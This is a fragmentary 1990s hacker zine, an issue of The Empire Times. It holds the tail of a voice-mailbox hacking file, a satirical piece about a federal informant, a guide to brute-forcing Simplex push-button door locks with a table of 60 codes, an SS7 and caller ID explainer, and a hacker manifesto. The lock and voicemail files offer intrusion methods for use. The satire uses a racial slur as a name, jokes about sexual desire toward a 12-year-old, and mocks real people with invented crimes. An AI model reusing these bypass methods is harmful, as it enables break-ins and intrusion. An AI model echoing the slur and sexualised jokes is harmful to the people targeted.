last time they accessed their v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you are screwed.  AHAH.  Solution.  Login.  Record the inpho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hear whether or not they recorded any inpho last time they were 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b your cool crystal clear sounding tape recorder and record their inp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y give it.  And then login to the vmb again but this time playba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ing.  It may work it may not.  It all depends on the user of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lu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hile gives you most of the inphormation you need to mess with an OC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B once you are inside.  I didn't give any elite inpho like how to dialou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you have to find that out yourself.  Also you can dial throug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dant.  This system can be used to set up 800 meetme's (so can Meridi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 This system is just as good as Meridian Mail maybe even better oh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ool inp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el Communications Corpo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90 Tasma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pitas, California USA 95035-74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08)/321-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itage: this shit g0es to y00r d0m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. freeze: y0y0y0y0 Dr. Fr33z3 in da hau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owar: uh Hello this is Black Menstraul and I'd like the #5ESS dialup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area so I can take over Bell Atlan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os: gimmie root on your system d00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0ach: ypsnarf them passw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_other_mother_fucka_i_didn't_mention: shouts go out to all yall mofo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8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dancer Da TelcoPi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-=- The Empire Times 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olume 2, Issue 4, File 5 of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My Life as a Nar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by No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all started one bright sunny May morning.  May 30th, 1993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x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I was, sitting at my computer terminal innocently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kMuse and TinyTim Mush.  Little did I know how much trouble I wa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et in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saw something in the reflection of my X-terminal, so I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.  Standing behind me was a Fed!  My heart stopped for a momen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an to pound furiously.  "Hello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man was tall, about 6', with dark brown hair and piercing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es.  "Agent Snorkel, Air Force OSI.  Can I speak with you for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s?"  I noticed his reflective sunglasses and long black trench co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ad memories of something written by Tom Cla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Uh..."  I looked around for my boss, "Sure.  I guess."  My bos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off reading another one of his molecular biology textb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 walked out to the center courtyard of the Pentagon.  It w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y day, so Agent Snorkel had to keep brushing his hair out of his e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at down on one of the benches and he pulled out his badge.  "We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by law to show you this."  Before I could even read the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d blob, he shoved it back inside his pocket.  Opening up his dayplan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proceeded to ask me several questions about the internet and cyberspa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n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responded with enthusiasm.  "MUSH programming is a great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 C code!"  He looked at me with an expression that said, "C code?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knew I was safe.  "Yes, I learn so much more about how to do my job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these games.  If only EVERYONE had this opportunity!"  Agent Snor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ded and made a few chicken scratches on a pad of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y mistake was in giving the guy too much information.  I could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limmer in his eyes when I said, "Oh yeah...these guys would do an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mpress a girl on the net.  They've told me about all SORTS of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've done which are probably against the law.  Hacking into a compu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, isn't i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so began my illustrious career as a nar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everyone is lucky enough to be considered worthy of posing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ker.  And certainly not many females!  However, lieing is a skill I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ned since childhood, when I used to do all sorts of things I wa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d to, and came up with a new and believable story on the spu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 every single ti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'm sure my appearance had something to do with it.  Who w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 that a 21-year-old girl with blonde hair and green eyes was a hack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one who had a top secret security clearance in the Pentagon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you, those hackers were not easily fooled!  It was tough to resi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ge to show up at the 2600 meetings in DC wearing my glasses and sweatpa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king and guzzling beer, setting a styrofoam cup or two on fire. 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how, I found the inner strength required to act completely normal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these fashion gurus and trend se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's another thing, speaking of urges that were hard to resist.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having fantasies about all of them.  It was all I could do not to rip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clothing and throw myself on the first 12-year-old who came within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t of me.  Instead, I had to pretend that I was attracted to the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kers - what a dra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h yeah, and the .gif's.  I had to pretend that the papers I car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with me had something to do with coding, or UNIX, when actuall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ere, were listings of my pornographic .gif collection.  It was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reat to have hidden cameras ALL OVER MY APARTMENT, if you catch my dr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is day, I keep those photos in a secret safe behind my couch. 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ing to release them when I'll be able to get top dollar.  I've been t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photo of Okinawa with the horse will bring a particularly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, but that's just between you and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you're probably wondering what exactly those slimy Feds wan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I'm gonna tell you that par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rst off, we monitored IRC around the clock.  You guessed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quite surpasses a Sunday night with a pot of coffee and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gabytes of meaningful chatter.  It's no wonder that students today sp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much time on IRC; it's such a learning experience.  You can lear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, from anatomy, to what's the latest in your local hardware st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ybe even the current jeopardy score if you're REALLY paying att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strong friendships that come about as a result of IRC, let'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et those.  Nothing beats a friend who cares about you so much that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a couple thousand copies of your email to send to his closest fri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condly, we dissected each and every usenet post on group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.2600.  We were surprised to find a secret code in each and every messag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would even spell out satanic messages when you printed them back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it, you'll see what I mean.  Incredible stuff.  We kept an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ing of who posted the most and on what topic, and of course the ho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ed.  Anyone who posted something including words like "bomb", "missil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ssassinate", or "federal" was immediately placed under surveillance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know how to get the most out of the taxpayer's doll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 also taped all the 2600 meetings.  It was a heck of a lot of f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queeze ourselves into the potted plants.  No spandex for us, oh no!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sure that we dressed in ceremonial robes of ambassadors so we woul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 out.  You know how observant those hackers are!  We have all s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criminating evidence on tape, from people actually talking to C-Cu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h, I thought you knew that was against the law), to Dr. Freeze wr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within arms reach in a bear hug.  The worst was when some kids t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ive away boxes of chocolate chip cookies.  Those boys are gonna do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TIME for that, I tell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w, onto the part that people always ask about.  Who's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t me first profile Supernigger.  This guy is quite a piece of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confident!  So...pa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is main mistake was having a fit of anger and deciding to cu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phone line when there were Fed-types in my apartment.  Boy did they l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ear me scream at him when he called to explain what had happen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at we have on him is a tape of him stealing a pack of bubble g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7-11 by his house.  It was pure detective work setting it up,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to the little camera hidden in the earring of the cashier.  We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he didn't suspect anything.  And why would he?  He's never b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 before, so he has no reason to be paranoi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there's KL.  Yes, the guy who's on the cover of that h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, the one who's got something pulled over most of his face.  That'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de the mark he had on his chin from being hit with the dart of a nerf g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weird story, something that happened to him at UUNET.  We never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 to get all the details, even though we had KL tied to a chai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days.  He's pretty good under those million kilowatt bulb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ways, we caught KL using a scanner to listen in on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ations of his neighbors.  Yep, he was planning on blackmailing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ghbors and using the money to pay off his legal bills.  We caught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-handed though, and he's agreed to help us out in the future...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what I mean...you never know when we might need him to help us s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our bosses or the local FBI o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to be forgotten is that John guy.  This was a little ha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is is a man who would NEVER break the law.  He even puts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me!  But, being brilliantly trained investigators, we soon discov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ing behind his handle, "Laughing Ga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Lgas' claim to fame is being the local hitman for the DC crow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p, whenever someone can't get their revenge through hacking or phrea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go to John.  John's most famous elimination procedure is shat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one's head with the front of his car.  His bumpers must be made of ST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omething!  Luckily, we only witnessed ten or eleven *SPLATS* befor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ffed him and brought him in to be tortured...err, questioned.  He respo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ur questions with peals of laughter, so we had him committed. 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s from the institution is that he keeps asking for internet access.  S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st but not least is the man we all know and love, the Wing. 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ever figure out his handle?  Nope, we don't know.  The way we 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if you subtract his age from the year of his birth, then multipl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666, and add that to the sum of his name in hexadecimal, it will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 IP address to a super top secret military base.  We're still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at, because it may have something to do with UFO's.  A young man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Chris Goggans helped us with that little tidbit of information.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elpful young man, always trying to do what's right and NEVER thinking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imsel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 any rate, the last I heard, the Wing is planning on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iews and writing a couple books about the trial that never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, come to think of it, we don't have anything on him.  But it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a good story to make people think we do!  Anything to keep the I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kers talking, and talking, and talking (dang, you'd think by now they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orgotten who I was, but NO!  to this day, my name appears at lea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lion times in all of our IRC logs...I guess there's nothing else to t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, now that every operating system on the internet is sec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's all for now fol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THE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-=- The Empire Times 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olume 2, Issue 4, File 6 of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How to Hack Simplex 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by erud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Simplex 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Complete Listing &amp; Hacking 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(x)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Simplex lock is one of those door locks with the 5 push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a 3 digit  code.  There are a lot of these  type lock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ntagon, (not high access, but for a little added security)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many many office building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kay, Simplex locks are very easy to hack, now think tha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use the same # twice in a row,  since it's already pushed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you can't have the same # twice in one code, because the #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ready  registered.  So that would leave 5 options fo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lection, 4 for the 2nd selection, (you can't do 2 in a row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 left for your last selection (since you can't use 2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# in a combo) so that is 5X4X3 which is = to 60. I needed to h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few of these simplex locks and I couldnt find a file that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w to actually "hack" it if you dont know the code.  Since I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o it myself and couldnt find it anywhere, I thought I'd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bout it. So what you basically do is either memorize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then start to manually hack it, or if you arnt a think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 get a mini-cassette  recorder &amp; record your voice say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e by one, manually enter them as you play the tape back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nt miss a combination. (This method is not as time consum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think if you can enter them fa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hope you can benifit from this text file, Simplex locks are f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erud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Here are all 60 combin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123    213    312    412    5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124    214    314    413    5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125    215    315    415    5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132    231    321    421    5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134    234    324    423    5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135    235    325    425    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142    241    341    431    5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143    243    342    432    5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145    245    345    435    5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152    251    351    451    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153    253    352    452    5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154    254    354    453    5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-=- The Empire Times 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olume 2, Issue 4, File 7 of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S7 and caller ID and stuff lik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by gren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keep reading things that talk about caller ID and ANI and SS7. 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pieces of the puzzle are always missing.  I decided to try clea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a litt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7 is really a complex packet network that links AT&amp;T UNIX proc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ones that run AT&amp;T toll offices and Bell Operating company cent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s) with a series of other UNIX routing processors called STPs (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Points) and SCPs (service control points).  STP's are really I/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s processors while SCP's are high speed database server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Ps. The SCPs are responsible for synchronizing information about numb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s, switching offices, call setups and routing (paths) and call accou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SS7 end point (telephone switch) has a unique PC or Point Code so ro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7 is a CCITT specification and the messages used by it as well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the network are public information.  AT&amp;T started SS7 in 19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t was known as CCIS or "common channel interoffice signalling". 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&amp;T, MCI and Sprint all use SS7, but many LECs (local exchange carri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participate.  Most likely this is because they would have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witching equipment which would cost big bucks which they would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nd on executive sal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"good ol days", each switch that received a call had to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th through the office either to a line or to a trunk to another o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d to receive and send call digits and call progress signals.  Since SS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X machines that control the individual physical AT&amp;T toll offi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ONGER IN CONTROL OF SELECTING THE CALL PATH THROUGH THE OFFICE!  H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jor crashes that happen when the system goes down because one node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or a bug hits them all. The SS7 packet network is currently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T1 (1.544mb/s) connections, but lots of it is still runn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6kb/s links - digital private lines that are hooked up between the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network is a system of "links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" links connect telephone switches or data bases to STP proce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" links connect STP pairs in different areas of the country or reg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" links connect mated STP pairs (STP's are duplicated to prevent failur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" links interconnect different SS7 networks such as AT&amp;T's and MCI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" links connect a telephone switch to an STP in a different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" links connect telephone switches to other telephon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is called associated signall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LECs and IXC's are greedy and since extortion is their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don't cooperate very well and LEC SS7 networks only talk to IX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terexchange carrier) networks like AT&amp;T, MCI and Sprint 'cause the law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have to.  ANI (automatic number identification) over SS7 only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 from the LEC to the IXC when a call leaves a LATA.  The IXC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ver it to the distant end L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XCs are therefore the only ones who can provide nation (or wor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e calling party ID and then only if your equipment (PBX) is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to their networks. This is why caller ID is anly availabl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 areas and even then it may not be able to cross two switching off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LEC's don't often build "F" links among their own switching system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ften because the software releases of the switching contro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n't SS7 compatible.  For example, 1ESS needs generic 1AE10, 5ESS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E4.2 and DMS100 (the most popular Northern Tel switch) needs BCS25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routing STPs are most often AT&amp;T 2ASTP's, DSC DEX Megahub (MCI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I SuperNodes.  Of course the software on each of these systems is unfrie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others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is leaves a whole world of UNIX computers out there for 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with.  The more the merrier....  In the future, I'll try to fi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 structure information about the STPs and SCPs and if anyone w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detail, leave a note on Digital Anarc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D part about it all is that there is no longer much roo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nonymous" telephone calls.  The Telco's and the Federales can see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your connections and identify both you and the other end.  If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that, obviously they can also listen to your data and your voice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we need to work really hard on systems like encryption and tempne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eudopacket nets to keep our privacy and anonym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some notes and let me know what (besides the obvious shi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s and numbers and id's and passwords) you need to know. I'll t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 it and keep these short and useful, maybe with a 2 week interval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issue will look at AUDIX - the most common voice mailbox system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&amp;T's PBX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la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gren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-=- The Empire Times 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olume 2, Issue 4, File 8 of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Don't tell me our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by erud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ve you ever wondered why?  Have you ever wondered how?  I b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ed you had, or tried.  I do, I think, I wonder, I explore, I live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y you come forth to me and ask me for advice.  While now you tur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e up at the sight of my name, our nam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take me as a man in black, but I won't let that stop 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ng my point.  You fear me, you loth me at the site of my name, our nam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could take me as a individual, or a person you would resp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, when you know my will is good.  When you know I'll advance the worl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again goes another lifeless kid playing on the computer,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one day make good money, no spouse, no where..  "He sits there and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g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 out how the machine works, he's probably just wasting he's ti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be, maybe.. That's me, I want to know how it works, I want to know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get into it.  "Damn Hacker, all he wants to do is put a viru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in there, wreck the computer, damn kid, he has no fea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d you know the difference? I still to this day have yet to me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hacker who's intentions are malicious, since one who is, is not a ha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won't let you try to kill my thought processes to try to tell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a threat to this world, when infact you who doesn't think is th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at.  Can you imagine a world without hackers now, a whole world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lines, going nowher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tell me I lie, tell me I cheat.  Make your excuses to expla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takes.  Society's mistakes, Society's whisp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nge our name, and think not what society's thrown upon u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we are..  You know they say "If you teach the what to think, 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0ecome the slave of knowledge, If you teach the how to think, knowled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 their slave."  Think things up not how you are imposed on, what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d..  Think things up from what you've found, what you've discover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look upon us in a without the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ver again shall you look about me as if I'm the suspect, as if I'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the felon.  Open your mind, and soak in the knowledge like a spo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merged into the ocean.  You hate my erudition, but that is fine by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gone through my share of hardships, oh yes but I won't let that stop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stating my poin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pire Times Q &amp; A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can I get The Empire Tim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PA] [#]             [System Name]          [System Operato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-------------   -------------------   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01) 384-2482        Empire                 Albat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03) PRIVATE         Digital Anarchy        Armi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+49) XXXXXXXXX       Secret Techtonics      Seven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Anonymous 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ext.archive.umich.edu    /pub/Zines/Emp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can I send my Article Submiss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mail Armitage or Albatross on either Digital Anarch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ire.  You can also mail them to me personally at armitage@dhp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kind of Files do we publis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publish anything dealing with tellecommunications and or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(or lack thereof).  Or anything interesting and or inform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 become a member boar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, probably not.  If you wish to distribute Empire Times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the file is distributed in it's full entire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no "Empire Times Distribution Sites", the thre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, are those are run by Armitage, Albatross, and Sevenup an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where you can get the Empire Times.  You see, obviously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Empire Times on Empire BBS and Armitage's BBS.. etc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